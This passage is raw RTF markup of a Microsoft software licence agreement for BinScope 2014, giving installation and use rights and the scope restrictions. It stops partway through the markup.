\\li0\\ri0\\sb100\\sa100\\sbauto1\\saauto1\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af0\\afs24\\alang1025 \\ltrch\\fcs0 \\fs24\\lang1033\\langfe1033\\loch\\f0\\hich\\af0\\dbch\\af31505\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext37 \\ssemihidden \\sunhideused \\styrsid7368928 Normal (Web);}{\\s38\\ql \\li0\\ri0\\widctlpar\\tqc\\tx4680\\tqr\\tx9360\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext38 \\slink39 \\sunhideused \\styrsid8661720 footer;}{\\\*\\cs39 \\additive \\rtlch\\fcs1 \\af39\\afs19 \\ltrch\\fcs0 \\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink38 \\slocked \\styrsid8661720 Footer Char;}}{\\\*\\listtable{\\list\\listtemplateid789093748\\listhybrid{\\listlevel\\levelnfc23\\levelnfcn23\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext \\leveltemplateid-317712510\\'01\\u-3913 ?;}{\\levelnumbers;}\\f3\\fbias0 \\s25\\fi-363\\li720\\jclisttab\\tx720\\lin720 }{\\listlevel\\levelnfc23\\levelnfcn23\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\leveltemplateid67698691 \\'01o;}{\\levelnumbers;}\\f2\\fbias0 \\fi-360\\li1440\\jclisttab\\tx1440\\lin1440 }{\\listlevel\\levelnfc23\\levelnfcn23\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\leveltemplateid67698693\\'01\\u-3929 ?;}{\\levelnumbers;} \\f10\\fbias0 \\fi-360\\li2160\\jclisttab\\tx2160\\lin2160 }{\\listlevel\\levelnfc23\\levelnfcn23\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\leveltemplateid67698689\\'01\\u-3913 ?;}{\\levelnumbers;}\\f3\\fbias0 \\fi-360\\li2880 \\jclisttab\\tx2880\\lin2880 }{\\listlevel\\levelnfc23\\levelnfcn23\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\leveltemplateid67698691\\'01o;}{\\levelnumbers;}\\f2\\fbias0 \\fi-360\\li3600\\jclisttab\\tx3600\\lin3600 }{\\listlevel \\levelnfc23\\levelnfcn23\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\leveltemplateid67698693\\'01\\u-3929 ?;}{\\levelnumbers;}\\f10\\fbias0 \\fi-360\\li4320\\jclisttab\\tx4320\\lin4320 }{\\listlevel\\levelnfc23\\levelnfcn23 \\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\leveltemplateid67698689\\'01\\u-3913 ?;}{\\levelnumbers;}\\f3\\fbias0 \\fi-360\\li5040\\jclisttab\\tx5040\\lin5040 }{\\listlevel\\levelnfc23\\levelnfcn23\\leveljc0\\leveljcn0\\levelfollow0 \\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\leveltemplateid67698691\\'01o;}{\\levelnumbers;}\\f2\\fbias0 \\fi-360\\li5760\\jclisttab\\tx5760\\lin5760 }{\\listlevel\\levelnfc23\\levelnfcn23\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0 {\\leveltext\\leveltemplateid67698693\\'01\\u-3929 ?;}{\\levelnumbers;}\\f10\\fbias0 \\fi-360\\li6480\\jclisttab\\tx6480\\lin6480 }{\\listname ;}\\listid477573462}{\\list\\listtemplateid-53848358{\\listlevel\\levelnfc0\\levelnfcn0\\leveljc0\\leveljcn0\\levelfollow0 \\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\'02\\'00.;}{\\levelnumbers\\'01;}\\rtlch\\fcs1 \\ab\\ai0\\af39\\afs20 \\ltrch\\fcs0 \\b\\i0\\f39\\fs20\\fbias0 \\s1\\fi-357\\li357\\jclisttab\\tx360\\lin357 }{\\listlevel\\levelnfc4\\levelnfcn4\\leveljc0\\leveljcn0\\levelfollow0 \\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\'02\\'01.;}{\\levelnumbers\\'01;}\\rtlch\\fcs1 \\ab\\ai0\\af39\\afs20 \\ltrch\\fcs0 \\b\\i0\\f39\\fs20\\fbias0 \\s2\\fi-363\\li720\\jclisttab\\tx720\\lin720 }{\\listlevel\\levelnfc2\\levelnfcn2\\leveljc0\\leveljcn0\\levelfollow0 \\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\'02\\'02.;}{\\levelnumbers\\'01;}\\rtlch\\fcs1 \\ab\\ai0\\af39\\afs20 \\ltrch\\fcs0 \\b\\i0\\f39\\fs20\\fbias0 \\s3\\fi-357\\li1077\\jclisttab\\tx1440\\lin1077 }{\\listlevel\\levelnfc3\\levelnfcn3\\leveljc0\\leveljcn0\\levelfollow0 \\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\'02\\'03.;}{\\levelnumbers\\'01;}\\rtlch\\fcs1 \\ab0\\ai0\\af40\\afs20 \\ltrch\\fcs0 \\b0\\i0\\strike0\\f40\\fs20\\ulnone\\fbias0 \\s4\\fi-358\\li1435\\jclisttab\\tx1437\\lin1435 }{\\listlevel\\levelnfc1\\levelnfcn1\\leveljc0 \\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\'02\\'04.;}{\\levelnumbers\\'01;}\\rtlch\\fcs1 \\ab0\\ai0\\af40\\afs20 \\ltrch\\fcs0 \\b0\\i0\\strike0\\f40\\fs20\\ulnone\\fbias0 \\s5\\fi-357\\li1792\\jclisttab\\tx2155\\lin1792 }{\\listlevel\\levelnfc0 \\levelnfcn0\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\'02\\'05.;}{\\levelnumbers\\'01;}\\rtlch\\fcs1 \\ab0\\ai0\\af40\\afs20 \\ltrch\\fcs0 \\b0\\i0\\f40\\fs20\\fbias0 \\s6\\fi-357\\li2149\\jclisttab\\tx2152\\lin2149 }{\\listlevel \\levelnfc4\\levelnfcn4\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\'02\\'06.;}{\\levelnumbers\\'01;}\\rtlch\\fcs1 \\ab0\\ai0\\af40\\afs20 \\ltrch\\fcs0 \\b0\\i0\\f40\\fs20\\fbias0 \\s7\\fi-357\\li2506\\jclisttab\\tx2509\\lin2506 } {\\listlevel\\levelnfc255\\levelnfcn255\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\'02i.;}{\\levelnumbers;}\\rtlch\\fcs1 \\ab0\\ai0\\af40\\afs20 \\ltrch\\fcs0 \\b0\\i0\\f40\\fs20\\fbias0 \\s8\\fi-357\\li2863\\jclisttab\\tx2866\\lin2863 } {\\listlevel\\levelnfc255\\levelnfcn255\\leveljc0\\leveljcn0\\levelfollow0\\levelstartat1\\levelspace0\\levelindent0{\\leveltext\\'02A.;}{\\levelnumbers;}\\rtlch\\fcs1 \\ab0\\ai0\\af40\\afs20 \\ltrch\\fcs0 \\b0\\i0\\f40\\fs20\\fbias0 \\s9\\fi-358\\li3221\\jclisttab\\tx3223\\lin3221 } {\\listname ;}\\listid752163927}}{\\\*\\listoverridetable{\\listoverride\\listid477573462\\listoverridecount0\\ls1}{\\listoverride\\listid752163927\\listoverridecount0\\ls2}{\\listoverride\\listid752163927\\listoverridecount9{\\lfolevel\\listoverridestartat\\levelstartat1} {\\lfolevel\\listoverridestartat\\levelstartat1}{\\lfolevel\\listoverridestartat\\levelstartat1}{\\lfolevel\\listoverridestartat\\levelstartat1}{\\lfolevel\\listoverridestartat\\levelstartat1}{\\lfolevel\\listoverridestartat\\levelstartat1}{\\lfolevel\\listoverridestartat \\levelstartat1}{\\lfolevel\\listoverridestartat\\levelstartat1}{\\lfolevel\\listoverridestartat\\levelstartat1}\\ls3}}{\\\*\\rsidtbl \\rsid211147\\rsid2560418\\rsid3109193\\rsid3369324\\rsid3436923\\rsid6632860\\rsid7368928\\rsid8537503\\rsid8661720\\rsid9203225\\rsid9330876} {\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1}{\\info{\\creatim\\yr2014\\mo9\\dy4\\hr12\\min31}{\\revtim\\yr2014\\mo9\\dy4\\hr12\\min32}{\\version1}{\\edmins0}{\\nofpages4}{\\nofwords1843} {\\nofchars10509}{\\nofcharsws12328}{\\vern57437}}{\\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\\paperw12240\\paperh15840\\margl720\\margr720\\margt720\\margb720\\gutter0\\ltrsect \\widowctrl\\ftnbj\\aenddoc\\trackmoves0\\trackformatting1\\donotembedsysfont1\\relyonvml0\\donotembedlingdata0\\grfdocevents0\\validatexml1\\showplaceholdtext0\\ignoremixedcontent0\\saveinvalidxml0\\showxmlerrors1\\noxlattoyen \\expshrtn\\noultrlspc\\dntblnsbdb\\nospaceforul\\formshade\\horzdoc\\dgmargin\\dghspace180\\dgvspace180\\dghorigin720\\dgvorigin720\\dghshow1\\dgvshow1 \\jexpand\\viewkind1\\viewscale100\\pgbrdrhead\\pgbrdrfoot\\splytwnine\\ftnlytwnine\\htmautsp\\nolnhtadjtbl\\useltbaln\\alntblind\\lytcalctblwd\\lyttblrtgr\\lnbrkrule\\nobrkwrptbl\\snaptogridincell\\rempersonalinfo\\allowfieldendsel \\wrppunct\\asianbrkrule\\rsidroot7368928\\newtblstyruls\\nogrowautofit\\remdttm\\usenormstyforlist\\noindnmbrts\\felnbrelev\\nocxsptable\\indrlsweleven\\noafcnsttbl\\afelev\\utinl\\hwelev\\spltpgpar\\notcvasp\\notbrkcnstfrctbl\\notvatxbx\\krnprsnet\\cachedcolbal \\nouicompat \\fet0{\\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0{\\\*\\ftnsep \\ltrpar \\pard\\plain \\ltrpar\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid3436923 \\chftnsep \\par }}{\\\*\\ftnsepc \\ltrpar \\pard\\plain \\ltrpar\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid3436923 \\chftnsepc \\par }}{\\\*\\aftnsep \\ltrpar \\pard\\plain \\ltrpar\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid3436923 \\chftnsep \\par }}{\\\*\\aftnsepc \\ltrpar \\pard\\plain \\ltrpar\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid3436923 \\chftnsepc \\par }}\\ltrpar \\sectd \\ltrsect\\psz1\\linex0\\headery0\\footery0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sftnbj {\\headerl \\ltrpar \\pard\\plain \\ltrpar\\s34\\ql \\li0\\ri0\\sb120\\sa120\\widctlpar \\tqc\\tx4320\\tqr\\tx8640\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid8661720 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid7368928\\charrsid8661720 \\hich\\af39\\dbch\\af11\\loch\\f39 }{\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid3109193\\charrsid8661720 \\par }}{\\headerr \\ltrpar \\pard\\plain \\ltrpar\\s34\\ql \\li0\\ri0\\sb120\\sa120\\widctlpar\\tqc\\tx4320\\tqr\\tx8640\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid8661720 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid3109193\\charrsid8661720 \\par }}{\\footerl \\ltrpar \\pard\\plain \\ltrpar\\s38\\ql \\li0\\ri0\\widctlpar\\tqc\\tx4680\\tqr\\tx9360\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid8661720 \\par }}{\\footerr \\ltrpar \\pard\\plain \\ltrpar\\s38\\ql \\li0\\ri0\\widctlpar\\tqc\\tx4680\\tqr\\tx9360\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid8661720 \\par }}{\\headerf \\ltrpar \\pard\\plain \\ltrpar\\s34\\ql \\li0\\ri0\\sb120\\sa120\\widctlpar\\tqc\\tx4320\\tqr\\tx8640\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid8661720 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid3109193\\charrsid8661720 \\par }}{\\footerf \\ltrpar \\pard\\plain \\ltrpar\\s38\\ql \\li0\\ri0\\widctlpar\\tqc\\tx4680\\tqr\\tx9360\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\insrsid8661720 \\par }}{\\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta .}}{\\\*\\pnseclvl2\\pnucltr\\pnstart1\\pnindent720\\pnhang {\\pntxta .}}{\\\*\\pnseclvl3\\pndec\\pnstart1\\pnindent720\\pnhang {\\pntxta .}}{\\\*\\pnseclvl4\\pnlcltr\\pnstart1\\pnindent720\\pnhang {\\pntxta )}} {\\\*\\pnseclvl5\\pndec\\pnstart1\\pnindent720\\pnhang {\\pntxtb (}{\\pntxta )}}{\\\*\\pnseclvl6\\pnlcltr\\pnstart1\\pnindent720\\pnhang {\\pntxtb (}{\\pntxta )}}{\\\*\\pnseclvl7\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb (}{\\pntxta )}}{\\\*\\pnseclvl8 \\pnlcltr\\pnstart1\\pnindent720\\pnhang {\\pntxtb (}{\\pntxta )}}{\\\*\\pnseclvl9\\pnlcrm\\pnstart1\\pnindent720\\pnhang {\\pntxtb (}{\\pntxta )}}\\pard\\plain \\ltrpar \\s26\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs28\\alang1025 \\ltrch\\fcs0 \\b\\fs28\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 MICROSOFT\\hich\\af39\\dbch\\af13\\loch\\f39 SOFTWARE LICENSE TERMS \\par }\\pard\\plain \\ltrpar\\s27\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\brdrb\\brdrs\\brdrw10\\brsp20 \\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs28\\alang1025 \\ltrch\\fcs0 \\b\\fs28\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 MICROSOFT BINSCOPE VERSION }{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid6632860 \\hich\\af39\\dbch\\af13\\loch\\f39 2014}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\par }\\pard\\plain \\ltrpar\\s28\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. Please read them. They apply to the software named above, which includes\\hich\\af39\\dbch\\af13\\loch\\f39 the media on which you received it, if any. The terms also apply to any Microsoft \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}}\\pard\\plain \\ltrpar\\s25\\ql \\fi-360\\li360\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls1\\adjustright\\rin0\\lin360\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 updates, \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 supplements, \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 Internet-based services, and \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 support services \\par }\\pard\\plain \\ltrpar\\s28\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 for this software, unless other terms accompany those items. If so, those terms apply. \\par }{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 By using the software, you accept these terms. If you do not accept them, do not use the software. \\par }\\pard\\plain \\ltrpar\\s31\\ql \\li0\\ri0\\sb120\\sa120\\nowidctlpar\\brdrt\\brdrs\\brdrw10\\brsp20 \\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 If you comply with these license terms, you have the perpetual rights below.}{ \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 1.\\tab}}\\pard\\plain \\ltrpar\\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 { \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 INSTALLATION AND USE RIGHTS. }{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\cs29\\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 You may install and use any number of copies of \\hich\\af39\\dbch\\af13\\loch\\f39 the software on your devices}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 }{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\cs29\\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 to design, develop and test your programs.\]}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 2.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 SCOPE OF LICENSE.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 The software is licensed, not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law give\\hich\\af39\\dbch\\af13\\loch\\f39 s you more rights despite this limitation, you may use the software only as expressly permitted in this agreement. In doing so, you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may not \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}}\\pard\\plain \\ltrpar\\s25\\ql \\fi-363\\li720\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx720\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls1\\adjustright\\rin0\\lin720\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 work\\hich\\af39\\dbch\\af13\\loch\\f39 around any technical limitations in the software; \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 reverse engineer, decompile or disassemble the software, except and only to the extent that applicable law expressly permits, despite this limitation; \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 make more copies of the software than specified in \\hich\\af39\\dbch\\af13\\loch\\f39 this agreement or allowed by applicable law, despite this limitation; \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 publish the software for others to copy; \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 rent, lease or lend the software; or \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\loch\\af3\\hich\\af3\\dbch\\af13\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 use the software for commercial software hosting services. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 